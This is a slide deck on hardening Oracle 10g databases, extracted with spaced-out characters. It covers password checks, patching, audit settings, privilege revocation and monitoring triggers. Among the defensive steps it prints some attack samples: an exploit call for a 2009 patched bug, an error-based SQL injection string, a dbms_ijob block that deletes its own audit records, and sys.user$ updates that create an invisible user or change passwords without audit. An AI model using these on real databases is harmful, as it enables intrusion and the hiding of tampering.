8/12/2019 Hardening Oracle
1/33
1 2 3 4 5
6 7 8 9 10
we are here:
Best Practices for Oracle DatabasesHardening Oracle 10.2.0.3 / 10.2.0.4
Alexander Kornbrust
8/12/2019 Hardening Oracle
2/33
1 2 3 4 5
6 7 8 9 10
we are here:
Passwords (Security) Patches
Database Settings PUBLIC Privileges
Database Trigger
Compiling Views
Next Steps & Summary
Table of Content
8/12/2019 Hardening Oracle
3/33
1 2 3 4 5
6 7 8 9 10
we are here:
Weak and default passwords is still problem No.1 in mostOracle databases.
Even if Oracle default accounts like SYS, SYSTEM,
DBSNMP, are getting better, user accounts andtechnical accounts are often using weak passwords(password=username).
It is useless to spend time for Oracle Security if thedatabase is using weak/default passwords
Check (Oracle) passwords on a regular basis against acustom dictionary file
Passwords
8/12/2019 Hardening Oracle
4/33
1 2 3 4 5
6 7 8 9 10
we are here:
Do not use weak passwords and check all passwordson a regular basis, e.g. with checkpwd or repscan.
Check Passwords Regularly
C: \ >checkpwd system/[email protected]:1521/ORCL password_list.txt
Checkpwd 1. 23 [Wi n] - ( c) 2007 by Red- Dat abase- Secur i t y GmbHOr acl e Secur i t y Consul t i ng, Secur i t y Audi t s & Secur i t y Tr ai ni nght t p: / / www. r ed- dat abase- secur i t y. com
MDSYS has weak passwor d MDSYS [ EXPI RED & LOCKED]ORDSYS has weak passwor d ORDSYS [ EXPI RED & LOCKED]
DUMMY123 has weak passwor d DUMMY123 [ OPEN]DBSNMP OK [ OPEN]SCOTT has weak password TI GER [ OPEN]CTXSYS has weak passwor d CHANGE_ON_I NSTALL [ EXPI RED & LOCKED]SH has weak passwor d CHANGE_ON_I NSTALL [ EXPI RED & LOCKED]OUTLN has weak passwor d OUTLN [ EXPI RED & LOCKED]DI P has weak passwor d DI P [ EXPI RED & LOCKED]
DUMMY321 has weak passwor d 123YMMUD [ OPEN][ . . . ]SYS OK [ OPEN]SYSTEM OK [ OPEN]
Done. Summar y:
Passwor ds checked : 13900828Weak passwor ds f ound : 23El apsed t i me ( mi n: sec) : 0: 54Passwor ds / second : 265486
8/12/2019 Hardening Oracle
5/33
1 2 3 4 5
6 7 8 9 10
we are here:
If the passwords are good it is time to apply (security)patches.
You should always try to upgrade at least to a supported
version (e.g. 10.2.0.3 / 10.2.0.4).
After that you should apply the latest security patch fromOracle (January 2009 CPU).
For many reasons (newer version not supported, too many
instances, ) this is not always possible. In this caseyou should try to use a solution like Virtual Patching.
(Security) Patches
8/12/2019 Hardening Oracle
6/33
1 2 3 4 5
6 7 8 9 10
we are here:
Exploits for problems fixed with the January 2009 CPU arealready published on the internet:
exec EXFSYS. DBMS_EXPFI L_DR. GET_EXPRSET_STATS( ' EXFSYS' , ' EXF$VERSI ON' , ' EXFVERSI ON' ,' YYYYYYY" and 1=EVI LPROC( ) - - ' )
Oracle Security Community is fast
8/12/2019 Hardening Oracle
7/33
1 2 3 4 5
6 7 8 9 10
we are here:
The next step is to change the default audit settings fromOracle.
Database Settings
8/12/2019 Hardening Oracle
8/33
1 2 3 4 5
6 7 8 9 10
we are here:
audit_sys_operations
audit_sys_operationsBy default the database is not auditing SQL commands executed by theuser SYS. To change this behaviour it is necessary to change this value toTRUE. A reboot of the database is necessary after changing this value.
Command:
SQL> al t er syst em set audi t _sys_oper at i ons=t r uescope=spf i l e;
8/12/2019 Hardening Oracle
9/33
1 2 3 4 5
6 7 8 9 10
we are here:
audit_trail
audit_trailBy default the database is not auditing SQL commands. To enable auditingit is necessary to change this parameter to DB. In this case Oracle is writingall audit information from the database (but not the database vault auditinformation) into the table SYS.AUD$. Other options could be OS, DB,XML,EXTENDED . A reboot of the database is necessary after changing thisvalue.Extended is a new feature since Oracle 10g Rel.2
Command:
SQL> al t er syst em set audi t _t r ai l =DB, EXTENDEDscope=spf i l e;
8/12/2019 Hardening Oracle
10/33
1 2 3 4 5
6 7 8 9 10
we are here:
Now its time to remove dangerous privileges. The onlyquestion is
What is a dangerous package?
PUBLIC Privileges
8/12/2019 Hardening Oracle
11/33
1 2 3 4 5
6 7 8 9 10
we are here:
Now its time to remove dangerous privileges. The onlyquestion is
What is a dangerous package?
PUBLIC Privileges
If we look at the Oracle Security Checklist (Jul 2008) from Oracle, Oraclerecommends to remove the privileges from
UTL_TCPUTL_SMTP
UTL_MAILUTL_HTTPUTL_INADDRUTL_FILE
8/12/2019 Hardening Oracle
12/33
1 2 3 4 5
6 7 8 9 10
we are here:
PL/SQL Packages
What are the most dangerous packages in an Oracle database?
dbms_sql
ut l _f i l e
ut l _mai l
ut l _i naddr
ut l _t cp
dbms_l ob
dbms_xml gen
dbms_aw_xml
ct xsys. dr i t hsx
or dsys. or d_di com
kupp$pr oc
8/12/2019 Hardening Oracle
13/33
1 2 3 4 5
6 7 8 9 10
we are here:
PL/SQL Packages
What is the most dangerous package in an Oracle database?
dbms_sql (No. 1, allows privi lege escalation)
ut l _f i l e
ut l _mai l
ut l _i naddr
utl_tcp (No. 3, overtake the DB via TNS Listener)
dbms_l ob
dbms_xmlgen (No. 2, steal the entire DB with a single SQL Injection)
dbms_aw_xml
ct xsys. dr i t hsx
or dsys. or d_di com
kupp$pr oc
8/12/2019 Hardening Oracle
14/33
1 2 3 4 5
6 7 8 9 10
we are here:
PL/SQL Packages - Sample
Via a vulnerable web application it is possible to retrieve
information via error messages
' or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct banner)||' ' fromv$version))--
8/12/2019 Hardening Oracle
15/33
1 2 3 4 5
6 7 8 9 10
we are here:
Revoke Public Privileges I
utl_* and dbms_*
These packages are powerful and allow network access (e.g. utl_tcp,utl_http,...), file access (dbms_advisor, utl_file, ...), unsecure(dbms_random) or other powerful operations (e.g.dbms_obfuscation_toolkit). Execution privileges on these package shouldnot be granted to public.
Command (as user SYS):
SQL> r evoke execut e on ut l _ht t p f r om publ i c f or ce;SQL> r evoke execut e on ut l _t cp f r om publ i c f or ce;
SQL> r evoke execut e on ut l _f i l e f r om publ i c f or ce;
SQL> r evoke execut e on ut l _i naddr f r om publ i c f or ce;
SQL> r evoke execut e on ut l _smt p f r om publ i c f or ce;
SQL> r evoke execut e on ut l _dbws f r om publ i c f or ce;
SQL> r evoke execut e on dbms_l ob f r om publ i c f or ce;
SQL> r evoke execut e on dbms_r andom f r om publ i c f or ce;SQL> r evoke execut e on dbms_obf uscat i on_t ool ki t f r ompubl i c f or ce;
8/12/2019 Hardening Oracle
16/33
1 2 3 4 5
6 7 8 9 10
we are here:
Revoke Public Privileges II
SQL> r evoke execut e on dbms_cr ypt o_t ool ki t f r om publ i c
f or ce;
SQL> r evoke execut e on dbms_advi sor f r om publ i c f or ce;
SQL> r evoke execut e on dbms_l dap f r om publ i c f or ce;
SQL> r evoke execut e on dbms_l dap_ut l f r om publ i c f or ce;SQL> r evoke execut e on dbms_j ob f r om publ i c f or ce;
SQL> r evoke execut e on dbms_schedul er f r om publ i c f or ce;
SQL> r evoke execut e on dbms_ddl f r om publ i c f or ce;
SQL> r evoke execut e on dbms_epg f r om publ i c f or ce;
SQL> r evoke execut e on dbms_xml gen f r om publ i c f or ce;
SQL> r evoke execut e on dbms_aw_xml f r om publ i c f or ce;
SQL> r evoke execut e on ct xsys. dr i t hsx f r om publ i c f or ce;SQL> r evoke execut e on or dsys. or d_di com f r om publ i cf or ce;
R k db l f bli
8/12/2019 Hardening Oracle
17/33
1 2 3 4 5
6 7 8 9 10
we are here:
Revoke dbms_sql from public
dbms_sql
dbms_sql allows privilege escalation via the cursor technique. This problemis fixed in Oracle 11g but still possible in all previous Oracle versions.
Command (as user SYS):
SQL> cr eat e r ol e ROLE_DBMSSQL;
SQL> gr ant execut e on dbms_sql t o ROLE_DBMSSQL;
SQL> spool gr ant dbmssql . sql
SQL> sel ect di st i nct ' gr ant ROLE_DBMSSQL t o" ' | | owner | | ' " ; ' f r om al l _dependenci es wher er ef er enced_name = ' DBMS_SQL' and owner not i n( ' PUBLI C' ) ;
SQL> spool of fSQL> @gr ant dbmssql
SQL> r evoke execut e on dbms_sql f r om PUBLI C;
R k bli i il f Obj t T
8/12/2019 Hardening Oracle
18/33
1 2 3 4 5
6 7 8 9 10
we are here:
Revoke public privileges from Object Types
To harden the database it is necessary to revoke some privileges frommighty object types.
HTTPUriType
This object type allows every user to do HTTP-request. This can be used in
SQL Injection attacks to transfer data out of the database.Command (as user SYS):
SQL> r evoke execut e on HTTPUr i Type f r om publ i c f or ce;
D t b T i
8/12/2019 Hardening Oracle
19/33
1 2 3 4 5
6 7 8 9 10
we are here:
Database Trigger
Using Database trigger (LOGON, LOGOFF, DDL, GRANT, ERROR,SHUTDOWN, STARTUP) is a easy and powerful way to control the database.
Especially DLL trigger and Error trigger can help to achieve a better controlover the database.
DDL T i
8/12/2019 Hardening Oracle
20/33
1 2 3 4 5
6 7 8 9 10
we are here:
DDL Trigger
DDL_TRIGGER
This trigger is monitoring all DDL modifications (grant, alter, create, drop) onthe production database. It's necessary to change the IP address inside thetrigger.
Command (as user SYS):
SQL> cr eat e or r epl ace t r i gger DDLTr i gger
AFTER DDL ON DATABASE
DECLARE
r c VARCHAR( 4096) ;
BEGI N
begi nr c: =ut l _ht t p. r equest ( ' ht t p: / / 192. 168. 2. 201/ user =' | | or a_l ogi n_user | | ' ;
DDL_TYPE=' | | or a_sysevent | | ' ; DDL_OWNER=' | | or a_di ct _obj _owner | | ' ; DDL_NAME=' | | or a_di ct _obj _name| | ' ; sysdat e=' | | t o_char ( sysdat e, ' YYYY- MM- DDhh24: mi : ss' ) ;
except i on
when ut l _ht t p. REQUEST_FAI LED t hen nul l ; end;END;
/
Logon Trigger
8/12/2019 Hardening Oracle
21/33
1 2 3 4 5
6 7 8 9 10
we are here:
Logon Trigger
Logon Trigger
All logon requests should be monitored with a tamperproof audit log. Thiscould be implemented by using the a database logon trigger. This trigger issending all logon activities to a webserver. It's necessary to change the IPAddress.
Command (as user SYS):
SQL> cr eat e or r epl ace t r i gger sec_l ogon af t er l ogon on dat abase
DECLARE
r c VARCHAR( 4096) ;
begi n
begi n
r c: =ut l _ht t p. r equest ( ' ht t p: / / 192. 168. 2. 201/ l ogon_user =' | | user | | ' ; sessi oni d
=' | | sys_cont ext ( ' USERENV' , ' SESSI ONI D' ) | | ' ; host =' | | sys_cont ext ( ' USERENV' , ' HOST' ) | | ' ; i p=' | | or a_cl i ent _ i p_addr ess| | ' ; sysdat e=' | | t o_char ( sysdat e, ' YYYY-MM- DD hh24: mi : ss ' ) ) ;
except i on
when ut l _ht t p. REQUEST_FAI LED t hen nul l ; end;
End sec_l ogon; /
Error Trigger
8/12/2019 Hardening Oracle
22/33
1 2 3 4 5
6 7 8 9 10
we are here:
Error Trigger
Error trigger (optional)
This trigger is storing all Oracle error messages occurred on the server. This is really
useful to detect attacks, e.g. from SQL Injection
Command (as user SYS):
SQL>CREATE OR REPLACE TRI GGER af t er _er r or
AFTER SERVERERROR ON DATABASEDECLARE pragma aut onomous_t r ansact i on; i d NUMBER;sql _t ext ORA_NAME_LI ST_T; v_st mt CLOB; n NUMBER;
BEGI Nn : = or a_sql _t xt ( sql _t ext ) ;
I F n >= 1 THENFOR i I N 1. . n LOOP
v_st mt : = v_st mt | | sql _ text ( i ) ;END LOOP;
END I F;
FOR n I N 1. . or a_ser ver _er r or _dept h LOOPI F or a_ser ver _er r or ( n) i n (
' 900' , ' 906' , ' 907' , ' 911' , ' 917' , ' 920' , ' 923' , ' 933' , ' 970' , ' 1031' , ' 1476' , ' 1719', ' 1722' , ' 1742' , ' 1756' , ' 1789' , ' 1790' , ' 24247' , ' 29257' , ' 29540' ) THEN
I NSERT I NTO syst em. oraer r or VALUES ( SYS_GUI D( ), sysdat e, or a_l ogi n_user ,
or a_cl i ent _i p_addr ess, or a_ser ver _er r or ( n) , or a_ser ver _er r or _msg( n) ,v_st mt ) ;END I F; END LOOP;END af t er _er r or ; /
Oracle Auditing Problems and Issues
8/12/2019 Hardening Oracle
23/33
1 2 3 4 5
6 7 8 9 10
we are here:
Oracle Auditing Problems and Issues
Oracle Auditing is a 95% solution. If you can live with a 95% solution OracleAuditing will be sufficient for you.
Oracle Auditing problems:
can be bypassed using various ways interesting statement/object can not be audited
sometimes the wrong statement is logged
Oracle Auditing Bypassing Auditing
8/12/2019 Hardening Oracle
24/33
1 2 3 4 5
6 7 8 9 10
we are here:
Oracle Auditing Bypassing Auditing
The following problem was fixed with the January CPU 2009. Running a jobwith any PL/SQL statement via dbms_ijob does not leave any traces
Decl ar e
j j i nt eger : = 666666; - - j ob numberbegi n sys. dbms_i j ob. submi t ( J OB => j j ,
LUSER => ' SYS' , PUSER => ' SYS' , CUSER => ' SYS' ,NEXT_DATE => sysdat e, I NTERVAL => nul l ,
BROKEN => f al se, WHAT =>
' decl ar e j j i nt eger : = ' | | j j | | ' ;
begi n execut e i mmedi at e ' ' al t er syst em ar chi ve l ogcur r ent ' ' ;sys. dbms_i j ob. r emove( j j ) ;del et e f r om sys. aud$ wher e obj $name = ' ' DBMS_I J OB' ' ;commi t ;end; ' , sys. dbms_i j ob. r un( j j ) ;
end;
/
8/12/2019 Hardening Oracle
25/33
1 2 3 4 5
6 7 8 9 10
we are here:
Oracle Auditing Important objects not auditable
Important objects can not be audited. It is not possible to audit importanttables like sys.user$. This tables containts all user / role and passwordinformation from the Oracle database.
A password change could be performed by updating the table directly.
SQL> updat e sys. user $ set password = ' D4DF7931AB130E37'where name=' SYSTEM' ;
Thi s can not be audi t ed.
SQL> audi t al l on sys. user $;
audi t al l on sys. user $ERROR at l i ne 1:ORA- 00701: obj ect necessar y f or war mst ar t i ng dat abasecannot be al t er ed
8/12/2019 Hardening Oracle
26/33
1 2 3 4 5
6 7 8 9 10
we are here:
Oracle Auditing Important objects not auditable II
Another way to bypass Oracle Auditing is to modify the data dictionary objectdirectly. A user is normally created with the command "CREATE USERmyuser identified by mypassword".
Instead of using CREATE USER we can get the same result usingCREATE ROLE plus an UPDATE SYS.USER$
SQL> cr eat e r ol e myuser i dent i f i ed by mypasswor d;
- - conver t a r ol e i nt o a user
SQL> updat e sys. user $ set t ype#=1 where name=' MYUSER' ;
- - al t er nat i ve updat e, cr eat es an i nvi si bl e dat abase user
SQL> updat e sys. user $ set t ype#=2 where name=' MYUSER' ;
8/12/2019 Hardening Oracle
27/33
1 2 3 4 5
6 7 8 9 10
we are here:
Oracle Auditing Wrong statements logged
Since Oracle 10g it is possible to log the statement which caused the auditentry.
This sounds like a good feature but the database is sometimes (e.g. if VPD,
QueryRewrite, is used )modifying the SQL statement which was submitted.In this case Oracle is auditing the previous statement and not the statementwhich was executed.
This technique can be used to steal information from audited tables withoutleaving traces
Auditing I
8/12/2019 Hardening Oracle
28/33
1 2 3 4 5
6 7 8 9 10
we are here:
Auditing I
Enable Auditing
Audit interesting activities.
Command (as user SYS):
AUDI T CREATE USER BY ACCESS;
AUDI T ALTER USER BY ACCESS;AUDI T DROP USER BY ACCESS;
AUDI T CREATE ROLE BY ACCESS;
AUDI T SELECT ON DBA_USERS BY ACCESS;
AUDI T CREATE EXTERNAL J OB BY ACCESS; - - 10g Rel . 2
AUDI T CREATE J OB BY ACCESS; - - 10g Rel . 1
AUDI T CREATE ANY J OB BY ACCESS;
AUDI T CREATE ANY LI BRARY BY ACCESS;AUDI T ALTER DATABASE BY ACCESS;
AUDI T ALTER SYSTEM BY ACCESS;
AUDI T AUDI T SYSTEM BY ACCESS;
AUDI T EXEMPT ACCESS POLI CY BY ACCESS;AUDI T GRANT ANY PRI VI LEGE BY ACCESS;
Auditing II
8/12/2019 Hardening Oracle
29/33
1 2 3 4 5
6 7 8 9 10
we are here:
Auditing II
Command (as user SYS):
AUDI T GRANT ANY ROLE BY ACCESS;AUDI T ALTER PROFI LE BY ACCESS;
AUDI T CREATE ANY PROCEDURE BY ACCESS;
AUDI T ALTER ANY PROCEDURE BY ACCESS;
AUDI T DROP ANY PROCEDURE BY ACCESS;
AUDI T CREATE PUBLI C DATABASE LI NK BY ACCESS;
AUDI T CREATE PUBLI C SYNONYM BY ACCESS;
AUDI T EXECUTE ON DBMS_FGA BY ACCESS;
AUDI T EXECUTE ON DBMS_RLS BY ACCESS;
AUDI T EXECUTE ON DBMS_FI LE_TRANSFER BY ACCESS;
AUDI T EXECUTE ON DBMS_SCHEDULER BY ACCESS;AUDI T EXECUTE ON DBMS_J OB BY ACCESS;
AUDI T SELECT ON SYS. V_$SQL BY ACCESS;
AUDI T SELECT ON SYS. GV_$SQL BY ACCESS;
AUDI T EXECUTE ON SYS. KUPP$PROC BY ACCESS;AUDI T EXECUTE ON DBMS_XMLGEN BY ACCESS;AUDI T EXECUTE ON DBMS_NETWORK_ACL_ADMI N BY ACCESS; - - 11g
Recompile All Views
8/12/2019 Hardening Oracle
30/33
1 2 3 4 5
6 7 8 9 10
we are here:
Recompile All Views
Recompile all view
To get rid of the "create view" problem it is necessary to recompile all views. This
can be done with the script"$ORACLE_HOME/ CPU/ cpuapr 2008/ vi ew_r ecompi l e/ vi ew_r ecompi l e
_apr 2008cpu. sql " . This can take up to 4 hours depending of the size of your
database.
Command (as user SYS):
cd $ORACLE_HOME/ CPU/ cpuapr 2008/ vi ew_r ecompi l e
SQL> @vi ew_r ecompi l e_apr 2008cpu. sql
Next steps & Summary
8/12/2019 Hardening Oracle
31/33
1 2 3 4 5
6 7 8 9 10
we are here:
Next steps & Summary
This was just the baseline security for Oracle databases. If you needmore this baseline
Check your own application code
Train the DBAs, Developers and Security People
Perform regular security audit
Run database scanners regularly
Use 3rd-party products to increase the security
Links
8/12/2019 Hardening Oracle
32/33
1 2 3 4 5
6 7 8 9 10
we are here:
Links
Oracle Password Checker:http://www.red-database-security.com/software/checkpwd.htmlhttp://www.red-database-security.com/software/repscan.html
Exploit Code for January 2009 CPU:http://blog.red-database-security.com/2009/01/21/exploit-for-january-cpu-2009-published/http://blog.red-database-security.com/2009/01/16/proof-of-concept-how-to-bypass-oracle-auditing-using-dbms_ijob/
Oracle Security Checklist:http://www.oracle.com/technology/deploy/security/database-security/pdf/twp_security_checklist_database.pdf
Oracle SQL Injection Tutorial:http://blog.red-database-security.com/2009/01/17/tutorial-oracle-sql-injection-in-webapps-part-i/
http://www.red-database-security.com/software/checkpwd.htmlhttp://www.red-database-security.com/software/repscan.htmlhttp://blog.red-database-security.com/2009/01/21/exploit-for-january-cpu-2009-published/http://blog.red-database-security.com/2009/01/21/exploit-for-january-cpu-2009-published/http://blog.red-database-security.com/2009/01/16/proof-of-concept-how-to-bypass-oracle-auditing-using-dbms_ijob/http://blog.red-database-security.com/2009/01/16/proof-of-concept-how-to-bypass-oracle-auditing-using-dbms_ijob/http://www.oracle.com/technology/deploy/security/database-security/pdf/twp_security_checklist_database.pdfhttp://www.oracle.com/technology/deploy/security/database-security/pdf/twp_security_checklist_database.pdfhttp://blog.red-database-security.com/2009/01/17/tutorial-oracle-sql-injection-in-webapps-part-i/http://blog.red-database-security.com/2009/01/17/tutorial-oracle-sql-injection-in-webapps-part-i/http://blog.red-database-security.com/2009/01/17/tutorial-oracle-sql-injection-in-webapps-part-i/http://blog.red-database-security.com/2009/01/17/tutorial-oracle-sql-injection-in-webapps-part-i/http://www.oracle.com/technology/deploy/security/database-security/pdf/twp_security_checklist_database.pdfhttp://www.oracle.com/technology/deploy/security/database-security/pdf/twp_security_checklist_database.pdfhttp://blog.red-database-security.com/2009/01/16/proof-of-concept-how-to-bypass-oracle-auditing-using-dbms_ijob/http://blog.red-database-security.com/2009/01/16/proof-of-concept-how-to-bypass-oracle-auditing-using-dbms_ijob/http://blog.red-database-security.com/2009/01/21/exploit-for-january-cpu-2009-published/http://blog.red-database-security.com/2009/01/21/exploit-for-january-cpu-2009-published/http://www.red-database-security.com/software/repscan.htmlhttp://www.red-database-security.com/software/checkpwd.html8/12/2019 Hardening Oracle
33/33
1 2 3 4 5
6 7 8 9 10
we are here:
Alexander Kornbrust
Red-Database-Security GmbH
Bliesstrasse 16
D-66538 NeunkirchenGermany
Phone: +49 (0)6821 95 17 637
Fax: +49 (0)6821 91 27 354E-Mail: info @ red-database-security.com
Contact